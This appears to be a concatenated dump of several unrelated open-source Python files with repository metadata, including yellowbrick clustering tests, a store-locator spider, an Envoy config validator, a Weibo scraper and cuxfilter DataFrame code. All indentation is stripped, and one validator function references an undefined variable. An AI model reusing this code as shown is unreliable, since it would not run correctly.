def _initialize(self):
super(BattlePassOffSeasonViewModel, self)._initialize()
self._addNumberProperty('level', 1)
self._addBoolProperty('hasBattlePass', False)
self._addBoolProperty('isPostProgression', False)
self._addBoolProperty('isPostProgressionCompleted', False)
self._addBoolProperty('isEnabled', True)
self._addStringProperty('leftVehicle', '')
self._addNumberProperty('leftPoints', 0)
self._addStringProperty('rightVehicle', '')
self._addNumberProperty('rightPoints', 0)
self._addStringProperty('seasonName', '')
self._addBoolProperty('isFailedService', False)
self._addStringProperty('voteStatus', 'notVote')
|
eefebb91d4ec9452c228eb6a9f52229e12e35ef0
|
88efd76316e4184d76a5e0585d95fe734233942c
|
/tests/test_cluster/test_elbow.py
|
ce3ad4ddeeac67d497fc6c34cfc8d5260a14688c
|
[
"Apache-2.0"
] |
permissive
|
DistrictDataLabs/yellowbrick
|
1ecd9f33e58f0d007569904401c204a6cdeb5661
|
f7a8e950bd31452ea2f5d402a1c5d519cd163fd5
|
refs/heads/develop
| 2023-08-03T12:25:26.511916
| 2023-07-05T18:14:28
| 2023-07-05T18:14:28
| 59,121,694
| 4,242
| 660
|
Apache-2.0
| 2023-07-15T17:50:31
| 2016-05-18T14:12:17
|
Python
|
UTF-8
|
Python
| false
| false
| 17,483
|
py
|
test_elbow.py
|
# tests.test_cluster.test_elbow
# Tests for the KElbowVisualizer
#
# Author: Benjamin Bengfort
# Created: Thu Mar 23 22:30:19 2017 -0400
#
# Copyright (C) 2017 The scikit-yb developers
# For license information, see LICENSE.txt
#
# ID: test_elbow.py [5a370c8] benjamin@bengfort.com $
"""
Tests for the KElbowVisualizer
"""
##########################################################################
## Imports
##########################################################################
import sys
import pytest
import numpy as np
import matplotlib.pyplot as plt
from scipy.sparse import csc_matrix, csr_matrix
from numpy.testing import assert_array_almost_equal
from sklearn.datasets import make_blobs
from sklearn.cluster import KMeans, MiniBatchKMeans
from sklearn.feature_extraction.text import TfidfVectorizer
from tests.fixtures import Dataset
from tests.base import VisualTestCase
from yellowbrick.datasets import load_hobbies
from yellowbrick.cluster.elbow import distortion_score
from yellowbrick.cluster.elbow import KElbowVisualizer, kelbow_visualizer
from yellowbrick.exceptions import YellowbrickValueError, YellowbrickWarning
from tests.base import IS_WINDOWS_OR_CONDA
try:
import pandas as pd
except ImportError:
pd = None
##########################################################################
## Data
##########################################################################
@pytest.fixture(scope="class")
def clusters(request):
# TODO: replace with make_blobs
X = np.array(
[
[-0.40020753, -4.67055317, -0.27191127, -1.49156318],
[0.37143349, -4.89391622, -1.23893945, 0.48318165],
[8.625142, -1.2372284, 1.39301471, 4.3394457],
[7.65803596, -2.21017215, 1.99175714, 3.71004654],
[0.89319875, -5.37152317, 1.50313598, 1.95284886],
[2.68362166, -5.78810913, -0.41233406, 1.94638989],
[7.63541182, -1.99606076, 0.9241231, 4.53478238],
[9.04699415, -0.74540679, 0.98042851, 5.99569071],
[1.02552122, -5.73874278, -1.74804915, -0.07831216],
[7.18135665, -3.49473178, 1.14300963, 4.46065816],
[0.58812902, -4.66559815, -0.72831685, 1.40171779],
[1.48620862, -5.9963108, 0.19145963, -1.11369256],
[7.6625556, -1.21328083, 2.06361094, 6.2643551],
[9.45050727, -1.36536078, 1.31154384, 3.89103468],
[6.88203724, -1.62040255, 3.89961049, 2.12865388],
[5.60842705, -2.10693356, 1.93328514, 3.90825432],
[2.35150936, -6.62836131, -1.84278374, 0.51540886],
[1.17446451, -5.62506058, -2.18420699, 1.21385128],
]
)
y = np.array([0, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1, 1, 1, 1, 0, 0])
request.cls.clusters = Dataset(X, y)
##########################################################################
## K-Elbow Helpers Test Cases
##########################################################################
@pytest.mark.usefixtures("clusters")
class TestKElbowHelper(object):
"""
Helper functions for K-Elbow Visualizer
"""
def test_distortion_score(self):
"""
Test the distortion score metric function
"""
score = distortion_score(self.clusters.X, self.clusters.y)
assert score == pytest.approx(69.10006514142941)
@pytest.mark.parametrize("func", [csc_matrix, csr_matrix], ids=["csc", "csr"])
def test_distortion_score_sparse_matrix_input(self, func):
"""
Test the distortion score metric on a sparse array
"""
score = distortion_score(func(self.clusters.X), self.clusters.y)
assert score == pytest.approx(69.10006514142938)
@pytest.mark.skipif(pd is None, reason="pandas is required")
def test_distortion_score_pandas_input(self):
"""
Test the distortion score metric on pandas DataFrame and Series
"""
df = pd.DataFrame(self.clusters.X)
s = pd.Series(self.clusters.y)
score = distortion_score(df, s)
assert score == pytest.approx(69.10006514142941)
def test_distortion_score_empty_clusters(self):
"""
Ensure no ValueError is thrown when there are empty clusters #1185
"""
X = np.array([[1,2],[3,4],[5,6]])
valuea = distortion_score(X, np.array([1,3,3]))
valueb = distortion_score(X, np.array([0,1,1]))
assert valuea == valueb
##########################################################################
## KElbowVisualizer Test Cases
##########################################################################
@pytest.mark.usefixtures("clusters")
class TestKElbowVisualizer(VisualTestCase):
"""
K-Elbow Visualizer Tests
"""
@pytest.mark.xfail(reason="images not close due to timing lines")
@pytest.mark.filterwarnings("ignore:No 'knee'")
def test_integrated_kmeans_elbow(self):
"""
Test no exceptions for kmeans k-elbow visualizer on blobs dataset
"""
# NOTE #182: cannot use occupancy dataset because of memory usage
# Generate a blobs data set
X, y = make_blobs(
n_samples=1000, n_features=12, centers=6, shuffle=True, random_state=42
)
try:
_, ax = plt.subplots()
visualizer = KElbowVisualizer(KMeans(random_state=42), k=4, ax=ax)
visualizer.fit(X)
visualizer.finalize()
self.assert_images_similar(visualizer)
except Exception as e:
pytest.fail("error during k-elbow: {}".format(e))
@pytest.mark.xfail(reason="images not close due to timing lines")
@pytest.mark.filterwarnings("ignore:No 'knee'")
def test_integrated_mini_batch_kmeans_elbow(self):
"""
Test no exceptions for mini-batch kmeans k-elbow visualizer
"""
# NOTE #182: cannot use occupancy dataset because of memory usage
# Generate a blobs data set
X, y = make_blobs(
n_samples=1000, n_features=12, centers=6, shuffle=True, random_state=42
)
try:
_, ax = plt.subplots()
visualizer = KElbowVisualizer(MiniBatchKMeans(random_state=42), k=4, ax=ax)
visualizer.fit(X)
visualizer.finalize()
self.assert_images_similar(visualizer)
except Exception as e:
pytest.fail("error during k-elbow: {}".format(e))
@pytest.mark.skip(reason="takes over 20 seconds to run")
def test_topic_modeling_k_means(self):
"""
Test topic modeling k-means on the hobbies corpus
"""
corpus = load_hobbies()
tfidf = TfidfVectorizer()
docs = tfidf.fit_transform(corpus.data)
visualizer = KElbowVisualizer(KMeans(), k=(4, 8))
visualizer.fit(docs)
visualizer.finalize()
self.assert_images_similar(visualizer)
def test_invalid_k(self):
"""
Assert that invalid values of K raise exceptions
"""
# Generate a blobs data set
X, y = make_blobs(
n_samples=1000, n_features=12, centers=6, shuffle=True, random_state=42
)
with pytest.raises(YellowbrickValueError):
KElbowVisualizer(KMeans(), k=(1, 2, 3, "foo", 5)).fit(X)
with pytest.raises(YellowbrickValueError):
KElbowVisualizer(KMeans(), k="foo").fit(X)
def test_valid_k(self):
"""
Assert that valid values of K generate correct k_values_
"""
# if k is an int, k_values_ = range(2, k+1)
# if k is a tuple of 2 ints, k_values = range(k[0], k[1])
# if k is an iterable, k_values_ = list(k)
# Generate a blobs data set
X, y = make_blobs(
n_samples=1000, n_features=12, centers=6, shuffle=True, random_state=42
)
visualizer = KElbowVisualizer(KMeans(), k=8).fit(X)
assert visualizer.k_values_ == list(np.arange(2, 8 + 1))
visualizer = KElbowVisualizer(KMeans(), k=(4, 12)).fit(X)
assert visualizer.k_values_ == list(np.arange(4, 12))
visualizer = KElbowVisualizer(KMeans(), k=np.arange(10, 100, 10)).fit(X)
assert visualizer.k_values_ == list(np.arange(10, 100, 10))
visualizer = KElbowVisualizer(KMeans(), k=[10, 20, 30, 40, 50, 60, 70, 80, 90]).fit(X)
assert visualizer.k_values_ == list(np.arange(10, 100, 10))
@pytest.mark.xfail(sys.platform == "win32", reason="images not close on windows")
def test_distortion_metric(self):
"""
Test the distortion metric of the k-elbow visualizer
"""
visualizer = KElbowVisualizer(
KMeans(random_state=0),
k=5,
metric="distortion",
timings=False,
locate_elbow=False,
)
visualizer.fit(self.clusters.X)
expected = np.array([69.100065, 54.081571, 43.146921, 34.978487])
assert len(visualizer.k_scores_) == 4
visualizer.finalize()
self.assert_images_similar(visualizer, tol=0.03)
assert_array_almost_equal(visualizer.k_scores_, expected)
@pytest.mark.xfail(sys.platform == "win32", reason="images not close on windows")
def test_silhouette_metric(self):
"""
Test the silhouette metric of the k-elbow visualizer
"""
visualizer = KElbowVisualizer(
KMeans(random_state=0),
k=5,
metric="silhouette",
timings=False,
locate_elbow=False,
)
visualizer.fit(self.clusters.X)
expected = np.array([0.691636, 0.456646, 0.255174, 0.239842])
assert len(visualizer.k_scores_) == 4
visualizer.finalize()
self.assert_images_similar(visualizer)
assert_array_almost_equal(visualizer.k_scores_, expected)
@pytest.mark.xfail(sys.platform == "win32", reason="images not close on windows")
def test_calinski_harabasz_metric(self):
"""
Test the calinski-harabasz metric of the k-elbow visualizer
"""
visualizer = KElbowVisualizer(
KMeans(random_state=0),
k=5,
metric="calinski_harabasz",
timings=False,
locate_elbow=False,
)
visualizer.fit(self.clusters.X)
assert len(visualizer.k_scores_) == 4
assert visualizer.elbow_value_ is None
expected = np.array([81.662726, 50.992378, 40.952179, 35.939494])
visualizer.finalize()
self.assert_images_similar(visualizer)
assert_array_almost_equal(visualizer.k_scores_, expected)
@pytest.mark.xfail(sys.platform == "win32", reason="images not close on windows")
def test_distance_metric(self):
"""
Test the manhattan distance metric of the distortion metric of the k-elbow visualizer
"""
visualizer = KElbowVisualizer(
KMeans(random_state=0),
k=5,
metric="distortion",
distance_metric='manhattan',
timings=False,
locate_elbow=False,
)
visualizer.fit(self.clusters.X)
assert len(visualizer.k_scores_) == 4
assert visualizer.elbow_value_ is None
expected = np.array([189.060129, 154.096223, 124.271208, 107.087566])
visualizer.finalize()
self.assert_images_similar(visualizer)
assert_array_almost_equal(visualizer.k_scores_, expected)
@pytest.mark.xfail(
IS_WINDOWS_OR_CONDA,
reason="computation of k_scores_ varies by 2.867 max absolute difference",
)
def test_locate_elbow(self):
"""
Test the addition of locate_elbow to an image
"""
X, y = make_blobs(
n_samples=1000, n_features=5, centers=3, shuffle=True, random_state=42
)
visualizer = KElbowVisualizer(
KMeans(random_state=0),
k=6,
metric="calinski_harabasz",
timings=False,
locate_elbow=True,
)
visualizer.fit(X)
assert len(visualizer.k_scores_) == 5
assert visualizer.elbow_value_ == 3
expected = np.array([4286.5, 12463.4, 8766.8, 6950.1, 5863.6])
visualizer.finalize()
self.assert_images_similar(visualizer, tol=0.5, windows_tol=2.2)
assert_array_almost_equal(visualizer.k_scores_, expected, decimal=1)
def test_no_knee(self):
"""
Assert that a warning is issued if there is no knee detected
"""
X, y = make_blobs(n_samples=1000, centers=3, n_features=12, random_state=12)
message = (
"No 'knee' or 'elbow point' detected "
"This could be due to bad clustering, no "
"actual clusters being formed etc."
)
with pytest.warns(YellowbrickWarning, match=message):
visualizer = KElbowVisualizer(
KMeans(random_state=12), k=(4, 12), locate_elbow=True
)
visualizer.fit(X)
def test_bad_metric(self):
"""
Assert KElbow raises an exception when a bad metric is supplied
"""
with pytest.raises(YellowbrickValueError):
KElbowVisualizer(KMeans(), k=5, metric="foo")
def test_bad_distance_metric(self):
"""
Assert KElbow raises an exception when a bad distance metric is supplied
"""
with pytest.raises(YellowbrickValueError):
KElbowVisualizer(KMeans(), k=5, distance_metric="foo")
@pytest.mark.xfail(
IS_WINDOWS_OR_CONDA,
reason="font rendering different in OS and/or Python; see #892",
)
def test_timings(self):
"""
Test the twinx double axes with k-elbow timings
"""
visualizer = KElbowVisualizer(
KMeans(random_state=0), k=5, timings=True, locate_elbow=False
)
visualizer.fit(self.clusters.X)
# Check that we kept track of time
assert len(visualizer.k_timers_) == 4
assert all([t > 0 for t in visualizer.k_timers_])
# Check that we plotted time on a twinx
assert hasattr(visualizer, "axes")
assert len(visualizer.axes) == 2
# delete the timings axes and
# overwrite k_timers_, k_values_ for image similarity Tests
visualizer.axes[1].remove()
visualizer.k_timers_ = [
0.01084589958190918,
0.011144161224365234,
0.017028093338012695,
0.010634183883666992,
]
visualizer.k_values_ = [2, 3, 4, 5]
# call draw again which is normally called in fit
visualizer.draw()
visualizer.finalize()
self.assert_images_similar(visualizer)
def test_sample_weights(self):
"""
Test that passing in sample weights correctly influences the clusterer's fit
"""
seed = 1234
# original data has 5 clusters
X, y = make_blobs(
n_samples=[5, 30, 30, 30, 30],
n_features=5,
random_state=seed,
shuffle=False,
)
visualizer = KElbowVisualizer(
KMeans(random_state=seed), k=(2, 12), timings=False
)
visualizer.fit(X)
assert visualizer.elbow_value_ == 5
# weights should push elbow down to 4
weights = np.concatenate([np.ones(5) * 0.0001, np.ones(120)])
visualizer.fit(X, sample_weight=weights)
assert visualizer.elbow_value_ == 4
@pytest.mark.xfail(reason="images not close due to timing lines")
def test_quick_method(self):
"""
Test the quick method producing a valid visualization
"""
X, y = make_blobs(
n_samples=1000, n_features=12, centers=8, shuffle=False, random_state=2
)
model = MiniBatchKMeans(3, random_state=43)
oz = kelbow_visualizer(model, X, show=False)
assert isinstance(oz, KElbowVisualizer)
self.assert_images_similar(oz)
def test_quick_method_params(self):
"""
Test the quick method correctly consumes the user-provided parameters
"""
X, y = make_blobs(centers=3)
custom_title = "My custom title"
model = KMeans(3, random_state=13)
oz = kelbow_visualizer(
model, X, sample_weight=np.ones(X.shape[0]), title=custom_title, show=False
)
assert oz.title == custom_title
@pytest.mark.xfail(sys.platform == "win32", reason="images not close on windows")
def test_set_colors_manually(self):
"""
Test the silhouette metric of the k-elbow visualizer
"""
oz = KElbowVisualizer(
KMeans(random_state=0), k=5,
)
oz.metric_color = "r"
oz.timing_color = "y"
oz.vline_color = "c"
# Create artificial "fit" data for testing purposes
oz.k_values_ = [1, 2, 3, 4, 5, 6, 7, 8]
oz.k_timers_ = [6.2, 8.3, 10.1, 15.8, 21.2, 27.9, 38.2, 44.9]
oz.k_scores_ = [.8, .7, .55, .48, .40, .38, .35, .30]
oz.elbow_value_ = 5
oz.elbow_score_ = 0.40
# Execute drawing
oz.draw()
oz.finalize()
self.assert_images_similar(oz, tol=3.2)
def test_get_params(self):
"""
Ensure the get params works for sklearn-compatibility
"""
oz = KElbowVisualizer(
KMeans(random_state=0), k=5,
)
params = oz.get_params()
assert len(params) > 0
|
76344baa211f5ff102812d124afba7d469481a53
|
71acb7214efd91c0d327f6d8958e1798eadb4401
|
/locations/spiders/baptist_health_arkansas.py
|
c7b9020488fdeb51a21d0b3756337a5b109766dd
|
[
"CC0-1.0",
"MIT"
] |
permissive
|
alltheplaces/alltheplaces
|
21b9f8b4ace1352e52ae7b8f8825a930d2cb033e
|
1bcbb55cfcf06f2c714465570711f6e83f205c22
|
refs/heads/master
| 2023-08-30T19:45:35.098658
| 2023-08-30T17:51:54
| 2023-08-30T17:51:54
| 61,166,935
| 453
| 176
|
NOASSERTION
| 2023-09-14T17:16:40
| 2016-06-15T01:09:18
|
Python
|
UTF-8
|
Python
| false
| false
| 2,021
|
py
|
baptist_health_arkansas.py
|
import scrapy
from scrapy.http import JsonRequest
from locations.items import Feature
from locations.spiders.vapestore_gb import clean_address
class BaptistHealthArkansasSpider(scrapy.Spider):
name = "bha"
item_attributes = {
"brand": "Baptist Health Foundation",
"brand_wikidata": "Q50379824",
}
allowed_domains = ["algolia.net", "baptist-health.com"]
def start_requests(self):
yield JsonRequest(
url="https://6eh1ib012d-dsn.algolia.net/1/indexes/*/queries?x-algolia-agent=Algolia%20for%20JavaScript%20(3.33.0)%3B%20Browser%20(lite)%3B%20instantsearch.js%20(3.6.0)%3B%20Vue%20(2.6.10)%3B%20Vue%20InstantSearch%20(2.3.0)%3B%20JS%20Helper%20(2.28.0)&x-algolia-application-id=6EH1IB012D&x-algolia-api-key=66eafc59867885378e0a81317ea35987",
data={
"requests": [
{
"indexName": "wp_posts_location",
"params": "query=&hitsPerPage=500&maxValuesPerFacet=150&page=0&facets=%5B%22city%22%2C%22facility_type%22%5D&tagFilters=",
}
]
},
callback=self.parse_stores,
)
def parse_stores(self, response):
for i in response.json()["results"]:
first_value = list(i.values())[0]
for j in first_value:
properties = {
"name": j["post_title"],
"ref": j["permalink"],
"website": j["permalink"],
"image": j["image"],
"street_address": clean_address([j["address_1"], j["address_2"]]),
"city": j["city"],
"state": j["state"],
"postcode": j["zip_code"],
"country": "US",
"phone": j["phone_number"],
"lat": float(j["_geoloc"]["lat"]),
"lon": float(j["_geoloc"]["lng"]),
}
yield Feature(**properties)
|
65b03fcdbe88062d707772ab917fe40755a56b7c
|
3f7028cc89a79582266a19acbde0d6b066a568de
|
/tools/config_validation/validate_fragment.py
|
c3b08b175b53b09eaab047fc965f30956398f80b
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
envoyproxy/envoy
|
882d3c7f316bf755889fb628bee514bb2f6f66f0
|
72f129d273fa32f49581db3abbaf4b62e3e3703c
|
refs/heads/main
| 2023-08-31T09:20:01.278000
| 2023-08-31T08:58:36
| 2023-08-31T08:58:36
| 65,214,191
| 21,404
| 4,756
|
Apache-2.0
| 2023-09-14T21:56:37
| 2016-08-08T15:07:24
|
C++
|
UTF-8
|
Python
| false
| false
| 2,103
|
py
|
validate_fragment.py
|
# Validate a YAML fragment against an Envoy API proto3 type.
#
# Example usage:
#
# bazel run //tools/config_validation:validate_fragment -- \
# envoy.config.bootstrap.v3.Bootstrap $PWD/configs/envoyproxy_io_proxy.yaml
import argparse
import pathlib
from envoy.base.utils import ProtobufValidator
# These functions are maintained for backward compatibility, and to provide a CLI validator
# Do not use these functions as library code - use `envoy.base.utils.ProtobufValidator` directly.
def validate_fragment(type_name, fragment, descriptor_path):
"""Validate a dictionary representing a JSON/YAML fragment against an Envoy API proto3 type.
Throws Protobuf errors on parsing exceptions, successful validations produce
no result.
Args:
type_name: a string providing the type name, e.g.
envoy.config.bootstrap.v3.Bootstrap.
fragment: a dictionary representing the parsed JSON/YAML configuration
fragment.
"""
ProtobufValidator(descriptor_path).validate_fragment(fragment, type_name)
def validate_yaml(type_name, content, descriptor_path):
ProtobufValidator(descriptor_path).validate_yaml(content, message_type)
def parse_args():
parser = argparse.ArgumentParser(
description='Validate a YAML fragment against an Envoy API proto3 type.')
parser.add_argument(
'message_type',
help='a string providing the type name, e.g. envoy.config.bootstrap.v3.Bootstrap.')
parser.add_argument('fragment_path', nargs='?', help='Path to a YAML configuration fragment.')
parser.add_argument('-s', required=False, help='YAML configuration fragment.')
parser.add_argument('--descriptor_path', nargs='?', help='Path to a protobuf descriptor file.')
return parser.parse_args()
if __name__ == '__main__':
parsed_args = parse_args()
message_type = parsed_args.message_type
content = parsed_args.s if (parsed_args.fragment_path is None) else pathlib.Path(
parsed_args.fragment_path).read_text()
ProtobufValidator(parsed_args.descriptor_path).validate_yaml(content, message_type)
|
b9472b819aa490264f052636373fed21d6bf68b1
|
480eef2cc1e9a28f07c7cc5bf0e14a7f145ad8f1
|
/wbTest.py
|
a77499fdf80ae49a96089e6ce9b459a6b8a1d680
|
[] |
no_license
|
wmz317/wmz317.github.io
|
b9e3d6e4dae8293f7f7e4e056dbc53c9f3a09fd4
|
b34e257a8b3271c564a08aec34c2b1293970a274
|
refs/heads/master
| 2023-01-20T07:16:47.462467
| 2020-12-01T06:13:28
| 2020-12-01T06:13:28
| 280,998,705
| 183
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,982
|
py
|
wbTest.py
|
import requests
from urllib.parse import urlencode
from pyquery import PyQuery as pq
base_url = 'https://m.weibo.cn/api/container/getIndex?'
headers = {
'Host': 'm.weibo.cn',
'Referer': 'https://m.weibo.cn/u/5687069307',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
'X-Requested-With': 'XMLHttpRequest', #设置请求为Ajax
}
max_page = 1
#模拟Ajax请求
def get_page(page):
params = {
'type': 'uid',
'value': '5687069307',
'containerid': '1076035687069307',
'page': page
}
url = base_url + urlencode(params) #合成完整的URL
try:
response = requests.get(url, headers=headers)
if response.status_code == 200: #判断响应的状态码
return response.json(), page
except requests.ConnectionError as e:
print('Error', e.args)
#解析并提取信息
def parse_page(json, page: int):
if json:
items = json.get('data').get('cards')
for index, item in enumerate(items):
if page == 1 and index == 1:
continue
else:
item = item.get('mblog', {})
weibo = {}
#weibo['id'] = item.get('id')
weibo['time'] =item.get('created_at')
weibo['正文'] = pq(item.get('text')).text() #借助pyquery去掉正文中的HTML
#weibo['点赞'] = item.get('attitudes_count')
#weibo['评论'] = item.get('comments_count')
#weibo['转发'] = item.get('reposts_count')
yield weibo
if __name__ == '__main__':
for page in range(1, max_page + 1):
json = get_page(page)
results = parse_page(*json)
nm = str(type(results))
print("Number_of_WBs:"+ nm)
#doc=open("output.txt","a",encoding='utf8')
for x in results:
print(x)
#doc.close()
|
28a3eb48f7a2c7d86d205fa468420740d44748de
|
a3d6556180e74af7b555f8d47d3fea55b94bcbda
|
/third_party/blink/web_tests/external/wpt/fetch/stale-while-revalidate/resources/stale-css.py
|
b87668373acb0b0483cd152e2e70adc1adc1ec7e
|
[
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"BSD-3-Clause",
"MIT",
"Apache-2.0"
] |
permissive
|
chromium/chromium
|
aaa9eda10115b50b0616d2f1aed5ef35d1d779d6
|
a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c
|
refs/heads/main
| 2023-08-24T00:35:12.585945
| 2023-08-23T22:01:11
| 2023-08-23T22:01:11
| 120,360,765
| 17,408
| 7,102
|
BSD-3-Clause
| 2023-09-10T23:44:27
| 2018-02-05T20:55:32
| null |
UTF-8
|
Python
| false
| false
| 883
|
py
|
stale-css.py
|
def main(request, response):
token = request.GET.first(b"token", None)
is_query = request.GET.first(b"query", None) != None
with request.server.stash.lock:
value = request.server.stash.take(token)
count = 0
if value != None:
count = int(value)
if is_query:
if count < 2:
request.server.stash.put(token, count)
else:
count = count + 1
request.server.stash.put(token, count)
if is_query:
headers = [(b"Count", count)]
content = b""
return 200, headers, content
else:
content = b"body { background: rgb(0, 128, 0); }"
if count > 1:
content = b"body { background: rgb(255, 0, 0); }"
headers = [(b"Content-Type", b"text/css"),
(b"Cache-Control", b"private, max-age=0, stale-while-revalidate=60")]
return 200, headers, content
|
0000c92314e4e579d7e405c81a7b632964a3429e
|
e61e664d95af3b93150cda5b92695be6551d2a7c
|
/vega/algorithms/nas/modnas/core/params/base.py
|
dd9964a4ac875746b74fbdcdf7568e91f917d6bd
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] |
permissive
|
huawei-noah/vega
|
44aaf8bb28b45f707ed6cd4e871ba70fc0c04846
|
12e37a1991eb6771a2999fe0a46ddda920c47948
|
refs/heads/master
| 2023-09-01T20:16:28.746745
| 2023-02-15T09:36:59
| 2023-02-15T09:36:59
| 273,667,533
| 850
| 184
|
NOASSERTION
| 2023-02-15T09:37:01
| 2020-06-20T08:20:06
|
Python
|
UTF-8
|
Python
| false
| false
| 2,441
|
py
|
base.py
|
# -*- coding:utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base parameter."""
from collections import OrderedDict
from typing import Any, Dict, Optional, Union, Callable
from modnas.core.event import event_emit, event_on
from modnas.core.param_space import ParamSpace
class Param():
"""Base parameter class."""
def __init__(
self, name: Optional[str] = None, space: Optional[ParamSpace] = None, on_update: Optional[Callable] = None
) -> None:
self.name = None
self._parent = None
self._children = OrderedDict()
(space or ParamSpace()).register(self, name)
self.event_name = 'update:{}'.format(self.name)
if on_update is not None:
event_on(self.event_name, on_update)
set_value_ori = self.set_value
def set_value_hooked(*args, **kwargs):
set_value_ori(*args, **kwargs)
self.on_update()
self.set_value = set_value_hooked
def __repr__(self) -> str:
"""Return representation string."""
return '{}(name={}, {})'.format(self.__class__.__name__, self.name, self.extra_repr())
def extra_repr(self):
"""Return extra representation string."""
return ''
def is_valid(self, value):
"""Return if the value is valid."""
return True
def value(self):
"""Return parameter value."""
return self.val
def set_value(self, value):
"""Set parameter value."""
if not self.is_valid(value):
raise ValueError('Invalid parameter value')
self.val = value
def on_update(self) -> None:
"""Trigger parameter update event."""
event_emit(self.event_name, self)
def __deepcopy__(self, memo: Dict[Union[int, str], Any]) -> Any:
"""Return deepcopy."""
# disable deepcopy
return self
|
1d3da272fdd793c180e2e46796d68919df7e7094
|
2210ba7d7ac0d88452cf47f768b2f58d2754ef3f
|
/python/cuxfilter/dataframe.py
|
a77794296c3cdcb06c9a1326335068c9ffcca4a6
|
[
"Apache-2.0"
] |
permissive
|
rapidsai/cuxfilter
|
81cd593c0addc503316f2b4e476cf732e61785ea
|
bc073d73fea6c0dcb25abc496e030d64611b5cd8
|
refs/heads/branch-23.10
| 2023-08-17T14:11:25.002839
| 2023-08-16T21:44:09
| 2023-08-16T21:44:09
| 161,231,707
| 253
| 65
|
Apache-2.0
| 2023-09-12T21:04:57
| 2018-12-10T20:19:49
|
Python
|
UTF-8
|
Python
| false
| false
| 6,622
|
py
|
dataframe.py
|
import cudf
import dask_cudf
import pyarrow as pa
from typing import Type
from cuxfilter.dashboard import DashBoard
from cuxfilter.layouts import single_feature
from cuxfilter.themes import default
from cuxfilter.assets import notebook_assets
def read_arrow(source):
# print('reading arrow file as arrow table from disk')
reader = pa.RecordBatchStreamReader(source)
pa_df = reader.read_all()
return pa_df
# class DataFrame:
class DataFrame:
"""
A cuxfilter GPU DataFrame object
"""
data: Type[cudf.DataFrame] = None
is_graph = False
edges: Type[cudf.DataFrame] = None
@classmethod
def from_arrow(cls, dataframe_location):
"""
read an arrow file from disk as cuxfilter.DataFrame
Parameters
----------
dataframe_location: str or arrow in-memory table
Returns
-------
cuxfilter.DataFrame object
Examples
--------
Read dataframe as an arrow file from disk
>>> import cuxfilter
>>> import pyarrow as pa
>>> # create a temporary arrow table
>>> arrowTable = pa.Table.from_arrays([['foo', 'bar']], names=['name'])
>>> # read arrow table, can also ready .arrow file paths directly
>>> cux_df = cuxfilter.DataFrame.from_arrow(df)
"""
if isinstance(dataframe_location, str):
df = cudf.DataFrame.from_arrow(read_arrow(dataframe_location))
else:
df = cudf.DataFrame.from_arrow(dataframe_location)
return cls(df)
@classmethod
def from_dataframe(cls, dataframe):
"""
create a cuxfilter.DataFrame from cudf.DataFrame/dask_cudf.DataFrame
(zero-copy reference)
Parameters
----------
dataframe_location: cudf.DataFrame or dask_cudf.DataFrame
Returns
-------
cuxfilter.DataFrame object
Examples
--------
Read dataframe from a cudf.DataFrame/dask_cudf.DataFrame
>>> import cuxfilter
>>> import cudf
>>> cudf_df = cudf.DataFrame(
>>> {
>>> 'key': [0, 1, 2, 3, 4],
>>> 'val':[float(i + 10) for i in range(5)]
>>> }
>>> )
>>> cux_df = cuxfilter.DataFrame.from_dataframe(cudf_df)
"""
return cls(dataframe)
@classmethod
def load_graph(cls, graph):
"""
create a cuxfilter.DataFrame from cudf.DataFrame/dask_cudf.DataFrame
(zero-copy reference) from a graph object
Parameters
----------
tuple object (nodes, edges) where nodes and edges are cudf DataFrames
Returns
-------
cuxfilter.DataFrame object
Examples
--------
load graph from cugraph object
>>> import cuxfilter
>>> import cudf, cugraph
>>> edges = cudf.DataFrame(
>>> {
>>> 'source': [0, 1, 2, 3, 4],
>>> 'target':[0,1,2,3,4],
>>> 'weight':[4,4,2,6,7],
>>> }
>>> )
>>> G = cugraph.Graph()
>>> G.from_cudf_edgelist(edges, destination='target')
>>> cux_df = cuxfilter.DataFrame.load_graph((G.nodes(), G.edges()))
load graph from (nodes, edges)
>>> import cuxfilter
>>> import cudf
>>> nodes = cudf.DataFrame(
>>> {
>>> 'vertex': [0, 1, 2, 3, 4],
>>> 'x':[0,1,2,3,4],
>>> 'y':[4,4,2,6,7],
>>> 'attr': [0,1,1,1,1]
>>> }
>>> )
>>> edges = cudf.DataFrame(
>>> {
>>> 'source': [0, 1, 2, 3, 4],
>>> 'target':[0,1,2,3,4],
>>> 'weight':[4,4,2,6,7],
>>> }
>>> )
>>> cux_df = cuxfilter.DataFrame.load_graph((nodes,edges))
"""
if isinstance(graph, tuple):
nodes, edges = graph
df = cls(nodes)
df.is_graph = True
df.edges = edges
return df
raise ValueError(
"Expected value for graph - (nodes[cuDF], edges[cuDF])"
)
def __init__(self, data):
self.data = data
def validate_dask_index(self, data):
if isinstance(data, dask_cudf.DataFrame) and not (
data.known_divisions
):
return data.set_index(data.index.to_series(), npartitions=2)
return data
def preprocess_data(self):
self.data = self.validate_dask_index(self.data)
if self.is_graph:
self.edges = self.validate_dask_index(self.edges)
def dashboard(
self,
charts: list,
sidebar: list = [],
layout=single_feature,
theme=default,
title="Dashboard",
data_size_widget=True,
warnings=False,
layout_array=None,
):
"""
Creates a cuxfilter.DashBoard object
Parameters
----------
charts: list
list of cuxfilter.charts
layout: cuxfilter.layouts
theme: cuxfilter.themes, default cuxfilter.themes.default.
title: str
title of the dashboard, default "Dashboard"
